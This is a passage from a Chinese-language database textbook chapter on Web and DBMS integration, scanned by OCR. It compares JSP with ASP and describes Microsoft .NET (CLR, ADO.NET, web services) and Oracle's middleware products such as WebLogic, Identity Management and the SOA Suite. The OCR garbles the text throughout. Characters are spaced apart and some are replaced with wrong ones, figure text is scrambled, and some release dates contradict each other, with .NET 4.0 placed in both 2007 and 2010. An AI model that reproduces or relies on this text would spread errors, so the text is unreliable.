可 以 运行 在 任何 支持 Java 的 Web 服务 器 上 ， 可 被 大 量 不 同 的 市 场 工具 所 支持 。 相 比 
之 下 ，ASP 主要 限制 在 Microsoft 的 基于 Windows 的 平台 上 。Java 团体 强调 可 移植 性 
的 重要 性 ， 但 是 许多 组 织 对 互 操作 性 表现 出 了 越 来 越 强 烈 的 兴趣 ， 而 不 是 可 移植 性 。 
@ 可 扩展 性 。 尽 管 两 种 技术 都 使 用 了 脚本 和 标记 来 创建 动态 的 网 页 ， 但 是 JSP 允许 开 
发 人 员 扩 展 可 用 的 JSP 标记 。 这 就 允许 开发 人 员 创 建 自 定义 的 标记 库 ， 这 样 可 以 被 
其 他 开发 人 员 所 使 用 ， 从 而 简化 开发 过 程 ， 缩 短 开 发 周期 。 
@ 可 重用 性 。JSP 组 件 (JavaBean、EJB 和 自 定 义 标记 ) 可 以 跨 平台 重用 。 例 如 ，EJB 
组 件 可 以 跨 不 同 的 平台 (例如 UNIX 和 Windows) 访问 分 布 式 数据 库 。 
@ 安全 性 和 可 靠 性 。JSP 有 附加 的 优点 ， 它 受益 于 Java 内 骨 的 安全 模型 和 继承 的 Java 
类 型 安全 性 ， 这 使 得 JSP 潜在 地 更 加 可 靠 。 


29.8.5 Microsoft .NET 


尽管 微软 的 Web 方案 平台 向 前 迈 出 了 一 大 步 ， 它 还 是 存在 一 些 缺 陷 : 

。 不 同 的 编程 模型 需要 多 种 语言 支持 ( 相 比 而 言 ，JEE 只 需要 Java 一 种 语言 )。 

e 没有 自动 的 状态 管理 。 

e 与 传统 的 Windows 用 户 接口 相 比 ，Web 用 户 接口 相对 简单 。 

e 需要 抽象 操作 系统 (因为 各 种 各 样 的 原因 ，Windows API 很 难 编程 )。 

因此 ， 在 这 种 发 展 趋势 下 ， 微 软 的 下 一 步 Web 方案 策略 即 是 开发 微软 .net。 新 的 平台 
下 包含 了 许多 新 的 工具 、 服 务 和 技术 ， 比 如 Windows 服务 器 、BizTalk 服务 器 (用 于 构建 基 
于 XML 的 跨 应 用 和 企业 的 业务 过 程 的 业务 过 程 管理 服务 器 )、 商 业 服务 器 〈 用 于 构建 可 伸缩 
的 电子 商务 方案 )、SQL 服务 器 (对 象 关 系 DBMS ) 和 微软 Visual Studio .NET (一 个 可 以 使 
用 多 种 开发 语言 如 C++、C# 和 刑 的 集成 开发 环境 ) 。 另 外 ， 还 包含 一 个 .NET 框架 ， 如 图 
29-25 所 示 ， 它 有 两 个 组 件 : 

e 通用 语言 运行 环境 (CLR )。 

e .NET 框架 类 库 。 

通用 语言 运行 环境 (CLRI) 

CLR 是 .NET 框架 的 核心 ， 它 负责 加 载 、 执 行 和 管理 编译 成 微软 中 间 语 言 (MSIL) 的 代 
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码 ， 这 种 中 间 语 言 类 似 于 Java 的 字 节 码 。 不 过 ，MSIL 不 是 解释 执行 ， 而 是 先 编译 成 本 地 二 
进 制 格式 ， 然 后 被 一 个 即时 编译 器 编译 成 通用 CLR 执行 。CLR 允许 一 种 语言 调用 另 一 种 语 
言 ， 甚 至 可 以 继承 和 修改 其 他 语言 的 对 象 。 


Ts 


NET 类 库 








| 编译 器 与 装载 器 






代码 校 验 与 优化 | 


Ee ER ET 
ET er 










内 存 管理 与 垃圾 收集 

| 代码 访问 安全 校 验 | 

| se i i i A i 人 和 这 A 
( 其 他 被 管理 的 服务 代码 ) 








通用 语言 运行 环境 


图 29-25 .Net 2.0 框架 


CLR 提供 了 一 些 服务 ， 如 内 存 管理 、 代 码 和 线程 执行 、 统 一 错误 处 理 以 及 安全 。 例 如 ， 
CLR 自动 地 处 理 对 象 布 局 ， 自 动 地 管理 对 象 的 引用 ， 当 它们 不 再 使 用 时 立即 进行 释放 。 这 
种 自动 内 存 管理 解决 了 应 用 程序 最 普遍 的 两 类 错误 ， 内 存 泄露 和 非法 内 存 引 用 。CLR 管理 
的 组 件 被 赋予 多 层 信任 级 别 ， 判 断 依据 多 种 因素 ， 例 如 包括 组 件 来 源 (本 地 计算 机 、 内 部 
网 、Internet)， 这 些 有 可 能 会 限制 它们 执行 特定 操作 的 能 力 ， 比 如 文件 访问 。 

CLR 还 施加 了 一 个 严格 的 类 型 和 代码 验证 设施 ， 称 为 通用 类 型 系统 (CTS)。CTS 包含 
了 一 系列 预定 义 数据 类 型 ， 既 可 以 表示 简单 的 数据 类 型 ， 如 数字 、 文 本 、 日 期 类 型 ， 还 包含 
一 些 复杂 的 数据 类 型 ， 用 于 开发 用 户 接 口 、 数 据 系统 、 文 件 管理 、 图 形 和 Internet 服务 。 

CLR 还 允许 一 个 应 用 程序 同时 运行 在 装 有 .NET 框架 不 同 版 本 的 同一 台 机 器 上 ， 应 用 不 
受 影 响 ， 即 由 应 用 程序 来 选择 CLR 和 组 件 的 版 本 。 

.NET 框架 类 库 

.NET 框架 类 库 是 一 些 可 重用 的 类 、 接 口 和 类 型 的 集合 ， 它 们 与 CLR 集成 在 一 起 ， 对 外 
提供 标准 的 功能 ， 如 字符 串 管理 、 输 入 /输出 、 安 全 管理 、 网 络 通信 、 线 程 管 理 、 用 户 接口 
设计 机 制 ， 以 及 我 们 特别 感 兴趣 的 数据 库 访 问 和 操作 。 类 库 中 包含 的 三 个 主要 组 件 是 : 

e 支持 用 户 接口 开发 的 Windows 窗 体 。 

e 支持 Web 应 用 和 Web service 开发 的 ASPNET 技术 。ASPNET 是 ASP 的 下 一 个 版 

本 ， 主 要 在 性 能 和 可 扩展 性 方面 进行 了 改进 。 
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帮助 应 用 连接 数据 库 的 ADO.NET 技术 ， 接 下 来 将 会 讨论 。 


.NET 3.0、.NET 3.5 和 .NET 4.0 
2006 年 发 行 的 .NET 3.0， 具备 以 下 几 个 新 的 特性 : 


Windows 显示 基础 (Windows Presentation Foundation，WPF)。 代 号 Avalon， 它 是 
一 个 用 于 开发 友好 用 户 界 面 的 图 形 子 系统 ,使 用 称 为 XAML 的 标记 语言 。 此 外 ， 
WPF 为 构建 应 用 提供 一 致 的 编程 模型 ， 清 晰 地 分 离 了 业务 逻辑 和 用 户 界面 的 编程 。 
Microsoft Silverlight 是 WPF 基于 Web 的 子 集 ， 支 持 采 用 与 .NET 应 用 相同 的 编程 模 
型 实现 类 Flash 的 Web 和 移动 应 用 。 

Windows 通信 基础 (WCF)。 代 号 Indigo， 它 是 用 于 构建 相互 间 通 信 应 用 的 编程 杠 
架 ， 支 持 面向 服务 的 应 用 。WCF 将 .NET 2.0 中 各 种 各 样 的 通信 编程 模型 统一 为 一 个 
公共 的 、 通 用 的 、 面 向 服务 的 通信 编程 模型 。 以 前 的 通信 编程 模型 包括 基于 SOAP 
的 通信 、 运 行 在 Windows 机 上 ( .NET 远程 ) 的 应 用 间 二 元 优化 的 通信 、 事 务 通信 
(分 布 式 事务 ) 和 异步 通信 (消息 队列 )。 

Windows CardSpace。Microsoft 的 认证 元 系统 (Identity Metasystem) 的 客户 端 软件 。 
CardSpace 为 用 户 保 留 对 其 数字 认证 信息 的 访问 ， 并 以 虚拟 信息 卡片 的 形式 展示 给 用 
户 。CardSpace 提供 一 致 的 用 户 界面 ， 帮 助 用 户 轻 松 地 接受 他 们 在 应 用 和 Web 网 站 
中 进行 认证 。 

Windows 工作 流 基础 (WF)。 定 义 、 执 行 和 管理 工作 流 的 技术 。 工 作 流通 过 空闲 时 
将 数据 持久 化 到 长 期 存储 (比如 数据 库 ) 中 ， 有 工作 要 做 时 ， 再 重新 加 载 任务 数据 ， 
来 处 理 长 寿 的 任务 。 如 果 新 的 情况 下 需要 工作 流行 为 与 创建 它 时 有 所 变化 ， 那 么 工 
作 流 实例 可 以 在 运行 时 动态 地 修改 。 


正如 图 29-26 所 示 ，2007 年 发 布 的 .NET 4.0 框架 也 加 入 了 许多 新 的 特性 。 例 如 : 
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图 29-26 .NET 4.0 框架 


集成 查询 语言 (Language Integrated Query，LINQ)， 用 含 LINQ 的 语言 编写 代码 ， 能 完 
成 筛选 、 枚 举 和 创建 不 同 SQL 数据 、 集 合 、XML 和 使 用 同一 语法 的 数据 集 的 投影 等 
操作 。 
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e ASPNET AJAX， 通 过 在 后 人 台 异 步 地 检索 服务 器 上 数据 ， 而 不 影响 当前 页 面 的 显示 和 
行为 ,创建 更 高 效 和 交互 式 的 、 能 在 主流 浏览 器 上 运行 的 web 页 面 。 
e 支持 创建 WCF 服务 的 新 网 络 协议 ,包括 AJAX、JSON ( JavaScript Object Notation ， 
JavaScript 对 象 标注 )、REST (REpresentational State Transfer， 特 征 状态 迁移 )，POX 
(Plain Old XML ， 文 本 XML)、RSS、ATOM (基于 XML 的 联合 格式 ) 和 一 些 新 的 
WS_* 标准 。 
如 图 29-26，2010 年 4 月 发 布 的 .NET 4.0 框架 包含 对 动态 运行 时 库 (DLR) 和 并 行 计算 
的 支持 ， 后 者 通过 并 行 LINQ 和 任务 并 行 库 实现 。 同 年 八 月 发 布 了 .NET 4.5 框架 ， 其 中 加 
入 了 对 骨 入 式 应 用 的 支持 。 
ADO.NET 
ADO.NET 是 ADO 的 下 一 个 版 本 ， 向 编程 人 员 提 供 了 许多 数据 访问 服务 。ADO.NET 主 
要 改进 了 传统 ADO 的 三 个 弱点 : 为 满足 Web 环境 的 需求 提供 了 一 个 非 链接 的 数据 访问 模型 ; 
改善 了 与 .NET 框架 类 库 的 兼容 性 ; 扩展 了 对 XML 的 支持 。ADO.NET 模型 与 传统 的 两 层 客 
户 - 服务 器 体系 结构 的 编程 模式 不 同 ， 它 在 整个 生命 周期 保持 连接 ， 无 须 额外 的 处 理 状态 。 
ADO 和 OLE DB 主要 为 连接 环境 设计 的 ， 尽管 随后 又 引入 RDS 用 于 非 链接 的 记录 集 ， 让 
开发 者 可 以 在 Web 环境 下 使 用 ADO 编程 模型 。 同 时 ，ADO 数据 模型 主要 用 于 关系 模型 ， 
难以 处 理 XML。XML 是 一 个 异 构 和 层次 式 的 数据 模型 ， 下 一 节 将 会 讨论 。 需 要 认识 到 ， 
ADO 是 一 种 已 被 广泛 使 用 的 成 熟 技 术 ， 在 .NET 框架 中 仍 被 保留 ， 并 可 通过 .NET COM 
互 操作 服务 访问 。 
如 图 29-27 所 示 ，ADO.NET 体系 主要 分 两 层 : 一 个 连接 层 (类 似 于 ADO) 和 一 个 非 链 
接 层 ， 即 DataSet (与 之 前 介绍 过 的 RDS 功能 类 似 )。ADO 记录 和 集 对 象 被 若干 对 象 取代 ， 
主要 包含 以 下 这 些 : 





数据 库 x 
图 29-27 ADO.NET 架构 


DataAdapter， 其 作用 是 在 开发 商 相关 的 数据 源 与 开发 商 无 关 的 DataSet 之 间 构 建 一 
座 桥梁 。 这 些 数据 源 可 能 是 一 个 关系 数据 库 ， 也 可 能 是 一 个 XML 文档 。DataAdapter 
使 用 四 个 内 部 命令 对 象 来 查询 、 插 入 、 修 改 和 删除 数据 源 中 的 数据 。 它 还 负责 填充 
DataSet 并 且 与 数据 源 保持 一 致 。 
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e。 DataReader， 它 从 数据 源 提供 了 一 个 链接 的 、 只 流出 的 、 只 读 的 数据 流 。 为 了 提高 
性 能 ，DataReader 可 以 独立 于 DataSet 使 用 . 

DataSet， 它 为 数据 源 提供 了 非 连接 的 记录 副本 。 无 须 连 接 数据 源 ，DataSet 在 内 存 
中 存储 了 一 个 或 多 个 表 的 记录 。 与 RDS 不 同 ，DataSet 还 会 保存 表 之 间 的 联系 和 约 
束 。DataSet 包含 了 一 个 或 多 个 DataTable 对 象 的 集 ， 它 们 由 数据 的 行 (DataRow) 和 
列 ( DataColumn) 以 及 关键 字 、 外 部 关键 字 和 约束 组 成 。DataSet 还 包含 了 一 个 或 多 个 
DataRelation 对 象 的 集 ， 通 过 DataColumn 对 象 关 联 两 个 DataTable 对 象 。DataTable、 
DataRelation、DataRow、DataColumn 和 Constraint 对 象 通过 相应 的 集 (分别 是 
DataTableCollection 、DataRelationCollection、DataRowCollection、DataColumn- 
Collection、ConstraintCollection) 被 引用 ， 如 图 29-24b 所 示 。 联 系 可 以 通过 DataRow 
类 的 getChildRows() 方法 来 遍历 。 在 内 存 中 ，DataSet 以 二 进 制 对 象 存储 ,但 是 当 转 
换 或 序列 化 时 就 表示 成 XML 格式 (作为 DiffGram )。 

一 个 .NET 框架 数据 提供 者 可 以 为 任何 数据 源 而 写 。.NET 当前 配备 了 六 种 数据 提供 者 : 
针对 SQL Server 的 .NET Framework Data Provider ; 针对 OLE DB 的 .NET Framework Data 
Provider ; 针对 ODBC 的 .NETFramework Data Provider ; 针对 Oracle 的 .NET Framework 
Data Provider; EntityClient Provider( 它 为 实体 数据 模型 (Entity Data Model，EDM) 应 用 提 
供 数 据 访问 ) 和 针对 SQL Server Compact 4.0 的 .NET Framework Data Provider。 

使 用 DataSet 的 方法 主要 有 下 面 几 种 : 

e 用 户 可 以 编程 在 DataSet 内 创建 DataTable、DataRelation 和 Constraint， 并 且 用 数据 

填充 表 。 

e 用 户 可 以 使 用 DataAdapter 从 已 有 的 关系 数据 源 中 将 数据 填 人 DataSet。 

e 可 以 从 XML 流 或 者 文档 中 加 载 内 容 到 DataSet 中 ， 可 以 是 数据 ， 也 可 以 是 XML 模 

式 信息 ， 或 者 两 者 兼 而 有 之 。 

另外 ， 一 个 DataSet 能 够 使 用 XML 做 成 持久 性 的 (可 有 或 没有 对 应 的 XML 模式 )。 这 

使 得 在 多 层 体 系 结构 的 不 同 层 的 DataSet 间 传 输 数 据 更 加 方便 。 


29.8.6 ”Microsoft Web 服务 


29.2.5 节 介 绍 了 Web 服务 的 概念 。Web 服务 是 微软 .NET 策略 的 基础 。.NET 框架 构建 
在 一 系列 工业 标准 之 上 ， 用 于 增强 与 非 微软 方案 的 互 操作 性 。 例 如 ，Visual Studio .NET 自 
动 创 建 将 应 用 转 成 Web 服务 所 需 的 XML 和 SOAP 接口 ， 让 开发 者 可 以 集中 注意 力 开发 应 
用 。 另 外 ，.NET 框架 提供 了 一 系列 类 来 与 所 有 重要 的 通信 标准 ， 例 如 SOAP、WSDL 和 
XML 取得 一 致 。 微 软 UDDI SDK 使 得 开发 者 可 以 在 开发 工具 中 加 入 UDDI 功能 ， 安 装 程序 
和 其 他 需要 注册 或 者 定位 的 Web 服务 。.NET 框架 也 支持 RESTful Web 服务 。 


29.9 Oracle Internet 平台 


Oracle 通过 混合 中 间 件 提供 了 以 Web 为 中 心 的 新 计算 模型 。 平 台 提供 多 种 服务 ， 包 括 
JavaEE 和 开发 工具 、 集 成 服务 、 商 务 智能 、 协 作 和 内 容 管理 。 图 29-28 给 出 了 简化 的 Oracle 
混合 中 间 层 架构 。 

它 是 一 个 基于 如 下 工业 标准 的 n 层 结构 : 

e 支撑 Web 的 HTTP 和 HTML/XML。 
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e Java、JEE、 企 业 JavaBeans ( EJB)、 用 于 数据 库 互 连 的 JDBC 和 SQLJ， 以 及 在 29.7 节 
中 讨论 过 的 Java servlets 和 JSP。 此 外 ， 还 支持 Java 报 文 服务 (Java Messaging Service， 
JMS)、Java 命名 和 目录 接口 (Java Naming and Directory Interface，JNDI)， 并 人 允许 
用 Java 编写 存储 过 程 。 

e 对 象 管理 组 的 关于 操作 对 象 的 CORBA 技术 (参见 28.1.2 节 )。 

e 对 象 内 部 互 操作 的 Internet 内 部 对 象 协 议 (Internet Inter-Object Protocol，IIOP) 和 远 
程 方法 调用 ( Remote Method Invocation，RMI)。 与 HTTP 一 样 ，IIOP 属于 TCP/IP 
之 上 的 应 用 层 ， 但 是 与 HTTP 不 同 的 是 ，IIOP 允许 在 对 象 的 多 次 调用 、 多 次 连接 之 
间 维 持 状态 信息 。 

e Web Service、 SOAP、 WSDL、 UDDI、 ebXML、WebDAV、LDAP 和 REST Web 
Services。 


e XML 及 相关 技术 (30.6 节 将 会 讨论 )。 
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图 29-28 Oracle 混合 中 间 件 架构 概览 


29.9.1 ” Oracle WebLogic 服务 器 


Oracle WebLogic 服务 器 是 一 个 可 扩展 的 准 企业 Java 平台 ， 企 业 版 (Java EE) 应 用 服务 
器 。 它 完全 实现 了 Sun Java EE 6 规范， 提供 了 一 套 标准 API， 用 于 开发 能 访问 各 种 服务 ， 
例如 数据 库 和 消息 服务 的 分 布 式 Java 应 用 。 用 户 使 用 Web 浏览 器 或 者 Java 客户 端 就 能 访问 
这 些 应 用 。 男 外 ，Oracle WebLogic 服务 器 还 支持 Spring 框架 ， 这 是 一 种 Java 应 用 开发 的 编 
程 模型 ， 能 部 分 取代 Java EE。 该 服务 器 核心 组 件 如 下 : 
e Oracle Coherence : 快速 访问 高 频数 据 ， 支持 关键 任务 应 用 的 扩展 。Oracle 
Coherence 可 以 动态 地 、 自 动 地 跨 服 务 器 划分 内 存 数据 ， 从 而 提供 连续 的 数据 可 用 性 
和 事务 完整 性 ， 即 使 在 服务 器 出 现 故 障 时 。 
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e JRockit : 针对 Intel 架构 优化 的 高 性 能 JVM， 确 保 Java 应 用 程序 的 可 靠 性 、 可 扩展 
性 、 可 管理 性 和 灵活 性 。 

e WebLogic Tuxedo Connectivity ( WTC) : 支持 WebLogic 服务 器 应 用 和 Tuxedo 服务 
的 互 操作 。WTC 支持 WebLogic 服务 器 用 户 调 用 Tuxedo 服务 或 Tuxedo 用 户 调用 
EJB 以 处 理 请 求 。Tuxedo 为 关键 业务 应 用 提供 了 可 扩展 的 高 效 消息 传递 和 分 布 式 事 
务 处 理 。 
Oracle TopLink : TopLink 最 初 属 于 WebGain 公司 ， 目 前 被 Oracle 公司 收购 。TopLink 
是 持久 性 框架 ， 解 决 关 系数 据 库 中 Java 对 象 的 存储 和 EJB 对象- 关系 的 映射 机 制 。 
此 外 ，TopLink 封装 了 Java 对 象 和 关系 型 数据 库 之 间 的 差异 性 ， 使 得 应 用 程序 可 以 
将 持久 Java 对 象 存储 到 JDBC 驱动 支持 的 任何 关系 数据 库 中 。TopLink 还 包含 一 个 
可 视 化 工具 一 一 Mapping Workbench， 该 工具 负责 对 象 模型 和 关系 模式 之 间 的 映射 。 
Mapping Workbench 使 用 元 数据 描述 符 (映射 ) 定义 具体 数据 库 模 式 中 的 对 象 存储 
方式 。 这 些 映 射 存储 在 XML 配置 文件 中 ， 即 sessions.xml 文 件 。 使 用 这 些 映射 ， 
TopLink 在 运行 时 动态 生成 所 需要 的 SQL 语句 。 另 外 ，Workbench 还 可 以 从 数据 对 
象 创 建 数据 库 模式 或 者 从 数据 库 模 式 生成 对 象 模型 ， 并 生成 EJB。 最 后 ，TopLink 还 
提供 了 基础 库 ， 该 基础 库 包 含 一 组 Java 类 ， 这 些 类 负责 连接 数据 库 、 存 储 对 象 到 数 
据 库 、 执 行 从 数据 库 返 回 对 象 的 查询 以 及 创建 同步 对 象 模 型 和 数据 库 修 改 的 事务 等 。 

Oracle WebLogic 服务 器 支持 许多 本 章 前 面 介 绍 的 技术 ， 包括 XML、EJB、JDBC、 
JMS、JNDI、JTA 和 JSP。 并 提供 了 将 应 用 程序 与 其 他 企业 系统 集成 的 工具 ， 包 括 Web 服务 、 
资源 适配器 ，JMS .NET 客户 端 和 JMS C 客户 端 。 

在 Oracle Fusion Middleware 12 c 中 ，WebLogic Server 支持 下 列 功 能 : 

e 针对 基于 XML 的 Web 服务 (JAX-WS) 的 Java API。 

e 针对 RESTful Web 服务 (JAX-RS ) 的 Java API。 

e 针对 基于 XML RPC (JAX-RPC) 的 Web 服务 的 Java API (虽然 JAX-WS 和 JAX-RS 

是 首选 Web 服务 类 型 )。 


29.9.2 Oracle Metadata Repository 


Oracle Metadata Repository 元 数据 仓库 包含 不 同系 统 组 件 的 元 数据 。 如 : Oracle BPEL 进 
程 管理 者 、Oracle B2B 和 Oracle Portal。 元 数据 仓库 可 以 是 基于 数据 库 的 也 可 以 是 基于 文件 的 。 


29.9.3 Oracle ldentity Management 


Oracle Identity Management 是 一 个 企业 认证 管理 系统 ， 它 管理 用 户 对 企业 资源 的 访问 权 
限 并 能 跨 Oracle 应 用 工作 。 它 还 提供 了 第 三 方 企 业 应 用 开发 的 服务 和 接口 。 这 些 接口 对 于 
必须 在 应 用 中 集成 身份 管理 的 开发 者 是 很 有 帮助 的 。Oracle Identity Management 由 以 下 几 
个 部 分 组 成 : 
e Oracle Internet Directory : 一 个 兼容 轻 量 级 目录 访问 协议 v3 (Lightweight 
Directory Access Protocol，LDAP) 的 目录 服务 。 
® Oracle Directory Integration Platform : 运行 在 Oracle WebLogic 服务 器 上 的 Java EE 
应 用 ， 可 以 同步 不 同 仓 库 和 Oracle 网 络 目录 。 同 步 既 可 以 是 单 向 的 也 可 以 是 双 回 的 。 
e Oracle Identity Federation: 一 种 身份 联合 的 解决 方案 ,支持 SAML (Security Assertion 


258 


之 八 部 分 Web 与 DBMS 


Markup Language， 安 全 断言 标记 语言 ) 和 WS- 联合 规范 单一 签名 。 使 用 基于 事件 
的 模型 ，Oracle 身份 联合 可 以 接收 、 处 理 和 响应 HTTP 和 SOAP 消息 。 联 合 服务 
器 一 旦 接收 到 断言 ， 就 开始 处 理 。 为 执行 验证 和 授权 决策 ，Oracle 身份 联合 还 集 
成 了 第 三 方 的 身份 和 访问 管理 系统 ， 包 括 AAA (Authentication，Authorization and 
Accounting， 认 证 授权 和 统计 ) 服务 器 和 LDAP， 以 及 RDBMS 用 户 数据 仓库 ， 例 如 
Oracle 网 络 目 录 和 Oracle 数据 库 。 

Oracle Virtual Directory : 一 种 目录 虚拟 化 的 解决 方案 ， 组 合 来 自 不 同 LDAP 目录 的 
信息 并 将 其 表现 为 单一 目录 和 模式 。 

Single Sign-on : 提供 多 个 、 独 立 或 关联 软件 系统 之 间 的 访问 控制 。 使 用 单一 签名 ， 
用 户 可 以 在 一 次 登录 的 情况 下 ， 获 取 对 不 同系 统 的 访问 权限 ， 而 不 需要 分 别 登录 。 
Oracle Platform Security Services: 为 Java SE 和 Java EE 应 用 提供 基于 标准 的 、 可 移 
植 的 、 集 成 的 安全 框架 。 

Oracle Role Manager : 一 个 管理 业务 和 组 织 机 构 的 关系 、 和 角色 和 资源 的 企业 类 应 用 
程序 。 它 同时 提供 角色 挖掘 、 组 织 建 模 和 管理 等 工具 。 

Oracle Adaptive Access Manager: 提供 欺诈 检测 和 欺诈 处 理 ， 包 括 严 格 认证 。 

Oracle Entitlements Server : 提供 安全 策略 的 统一 管理 ， 可 以 用 XACML (eXtensible 
Access Control Markup Language， 可 扩展 的 访问 控制 标记 语言 ) 描述 。OES 为 不 同 
应 用 提供 管理 访问 控制 策略 的 通用 框架 。 

Oracle Directory Services Manager : 一 个 基于 浏览 器 的 GUI 界面， 统一 管理 Oracle 
网 络 目录 和 虚拟 目录 的 实例 。 


29.9.4 Oracle Portal 


Oracle Portal 为 从 传统 的 桌面 连接 的 用 户 提供 了 门户 服务 。 一 个 门户 ( portal) 就 是 一 
个 基于 Web 的 应 用 ， 它 为 在 单个 网 页 上 访问 不 同 的 数据 类 型 提供 了 一 个 通用 的 集成 门户 点 。 
例如 ， 可 以 创建 门户 ， 让 用 户 访 问 web 应 用 、 文 档 、 报 表 、 图 形 以 及 存在 于 Internet 或 企 
业内 联网 中 的 URL 等 。 一 个 门户 页 面 由 许多 portlet 组 成 ， 它 们 组 成 了 页 面 的 多 个 区 域 来 为 
Web 资源 提供 动态 访问 。Oralce 提供 了 一 些 工具 来 产生 和 定制 门户 和 portlet。 


29.9.5 Oracle WebCenter 


Oracle WebCenter 包含 创建 Web 应 用 程序 、 门 户 和 团队 协作 /社会 站 点 的 一 系列 组 件 。 
它 的 目标 客户 包括 开发 者 社区 和 商业 用 户 。 具 体 而 言 ，Oracle WebCenter 开发 环境 包括 : 


Oracle Composer : 支持 定制 和 个 性 化 已 发 布 或 正在 使 用 中 的 应 用 程序 或 者 门户 的 一 
个 组 件 。 

WebCenter 框架 : 人 允许 用 户 在 Oracle ADF 应 用 中 艇 套 portlet、Oracle 应 用 开发 框架 
(Application Development Framework，ADF) 工作 流 、 内 容 和 自 定义 组 件 。 
WebCenter 服务 : 一 组 独立 部 署 的 协同 服务 ,包含 Web 2.0 组 件 ， 比 如 内 容 、 协 同和 
通信 服务 。Web Center 服务 包含 Oracle ADF 用 户 接口 组 件 ( 称 为 工作 流 )， 该 组 件 可 
以 直接 嵌入 到 ADF 应 用 程序 中 。 此 外 ， 用 户 可 以 自 定义 UI 以 将 不 同 的 服务 集成 到 
非 ADF 应 用 程序 中 。 

WebCenter 空间 : 基于 WebCenter 框架 和 服务 所 开发 的 财源 应 用 。 支 持 预制 的 项 目 


席 29 茧 Web 塘 大 与 DBMS 259 





协作 解决 方案 ， 与 微软 SharePoint 类 似 。 
Oracle WebCenter 有 望 在 未 来 取代 Oracle Portal。 


29.9.6 Oracle Bl Discoverer 


Oracle Business Intelligence Discoverer 是 负责 业务 数据 分 析 的 商务 智能 工具 ， 包 括 即时 
查询 、 报 表 、 分 析 和 Web 发 布 等 功能 。 这 些 工具 使 得 非 技 术 人 员 可 以 访问 数据 市 场 、 数 据 
仓库 、 多 维 ( OLAP) 数据 源 以 及 联机 事务 处 理 ( OLTP) 系统 。 面 向 终端 用 户 的 两 个 主要 业 
务 分 析 工 具 为 : 

e Discoverer Plus : 一 个 Web 工具， 支持 用 户 在 不 了 解数 据 库 的 情况 下 分 析 数 据 和 
生成 报表 。 借 助 向 导 对 话 框 和 菜单 ，Discoverer Plus 可 以 引导 用 户 一 步 步 创建 
Discoverer Plus、Piscouerer Viewer 、Oracle Portal 和 Oracle WebCenter 都 能 访问 
的 报表 和 图 表 。 

e@ Discoverer Viewer : 一 个 Web 浏览 器 工具 ， 用 于 访问 Discoverer Plus 创建 的 交互 式 
报表 或 图 表 。Piscouerer Viewer 也 能 用 于 发 布 报表 到 门户 上 。 


29.9.7 _ Oracle SOA Suite 


Oracle SOA ( Service-Oriented Architecture， 面 向 服务 ) Suite 支持 开发 者 在 SOA 组 合 
应 用 程序 中 创建 、 管 理 服 务 或 者 协同 多 种 服务 。 企 业 可 以 以 插件 的 方式 在 异 构 框 架 中 使 用 
Oracle SOA Suite， 实 现 增 量 开发 。 该 工具 箱包 含 下 列 组 成 部 分 : 
e@ Adapter : 借助 JCA (Java EE Connector Architecture，Java EE 连接 架构 ) 适 配 屁 ， 
有 助 于 集成 打包 应 用 、 遗 留 应 用 、 数 据 库 和 Web 服务 。 相 比 JDBC 连接 Java EE 应 
用 程序 与 数据 库 ，JCA 是 连接 遗留 系统 更 通用 的 架构 。 
e Oracle Service Bus : 连接 、 协 同 、 管 理 异 构 服 务 (如 Web 服务 和 Java 或 者 .Net) 之 
间 的 交互 ， 负 责 服 务 与 遗留 终端 则 的 消息 通信 。 它 处 理 传人 服务 的 请 求 消息 ， 确 定 
路 由 逻辑 并 在 兼容 其 他 服务 消费 者 的 情况 下 传送 消息 。 有 具体 而 言 ，Oracle 服务 总 线 
通过 HTTP/HTTP-S、FTP 和 JMS 等 传输 协议 接收 消息 ,使 用 相同 或 不 同 的 传输 协 
议 传送 消息 。 
e Oracle Complex Event Processing : 则 在 处 理 连续 无 界 数据 集 上 的 长 时 运行 查询 ， 比 
如 : 传感器 数据 应 用 、 金 融 证 券 、 网 络 性 能 测试 工具 和 点 击 率 分 析 工 具 。 它 是 一 个 
Java 服务 器 ， 支 持 高 级 上 下 文 的 创建 、 过 滤 、 关 联 和 聚集 以 及 在 Oracle 混合 中 间 件 
应 用 事件 上 的 模式 匹配 。 
e Oracle Business Rules: 支持 规范 和 业务 规则 的 动态 生成 。 
Oracle Business Activity Monitoring : 支持 商业 用 户 使 用 可 视 化 的 仪表 盘 和 智能 提醒 
获取 信息 。 此 外 ,用户 可 以 根据 业务 环境 的 变动 修改 商业 进程 并 进行 相应 的 矫正 。 
Oracle B2B : 一 种 电子 贸易 的 网 关 ， 支 持 企业 和 贸易 伙伴 进行 安全 、 可 靠 的 商业 文 
档 交 流 。Oracle B2B 是 典型 公司 - 公司 的 电子 商务 ， 如 在 因特网 上 进行 商品 或 服务 
的 买卖 。 它 支持 公司 - 公司 的 文档 标准 、 打 包 、 传 输 、 消 息 传递 服务 和 贸易 伙伴 以 
及 协议 的 管理 。 
Oracle BPEL Process Manager : 一 个 BPEL (Business Process Execution Language， 


商务 进程 执行 语言 ) 引擎 ， 负 责 把 不 同 应 用 程序 和 Web 服务 编排 到 商务 流程 中 来 。 
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采用 标准 方法 快速 地 开发 部 署 这 些 流程 很 大 程度 上 促进 了 SOA 的 开发 。 

Oracle Service Registry : 一 种 基于 标准 的 机 制 ， 负 责 发 布 和 发 现 Web 服务 及 相 
关 资 源 ， 如 XML 模式 或 扩展 样式 表 转 换 语 言 (Extensible Stylesheet Language 
Transformation，XSLT)。 

Oracle User Messaging Service : 支持 用 户 和 部 署 应 用 之 间 的 双向 交流 。 消 息 可 以 通 
过 email、XMPP ( eXtensible Massaging and Presence Protocol， 扩展 消息 传递 和 展 
示 协 议 ) 支持 的 IM、SMPP ( Short Message Peer-to-Peer， 消 息 点 对 点 协议 ) 支持 的 
SMS 以 及 Voice 进行 发 送 或 接收 。 

Human Workflow : 支持 工作 流 规范 ， 工 作 流 描述 了 用 户 或 团队 在 商业 流程 中 必须 
执行 的 任务 ， 比 如 分 配 、 路 由 任务 、 截 止 时 间 、 封 装 和 通知 等 ， 以 确保 任务 的 时 
效 性 。 

Oracle Mediator : 与 路 由 HTTP 的 负载 均衡 器 类 似 ，Oracle Mediator 将 数据 从 服务 
提供 者 路 由 到 外 部 合作 者 。 此 外 ， 它 也 可 以 订阅 和 发 布 业务 事件 。 


通信 服务 

通信 服务 处 理 所 有 OracleAS 接收 到 的 输出 请 求 ， 其 中 一 些 由 Oracle HTTP Server 来 处 
理 , 一 些 被 路 由 到 其 他 位 置 的 OracleAS 进行 处 理 。Oracle HTTP Server 是 当前 使 用 最 广泛 
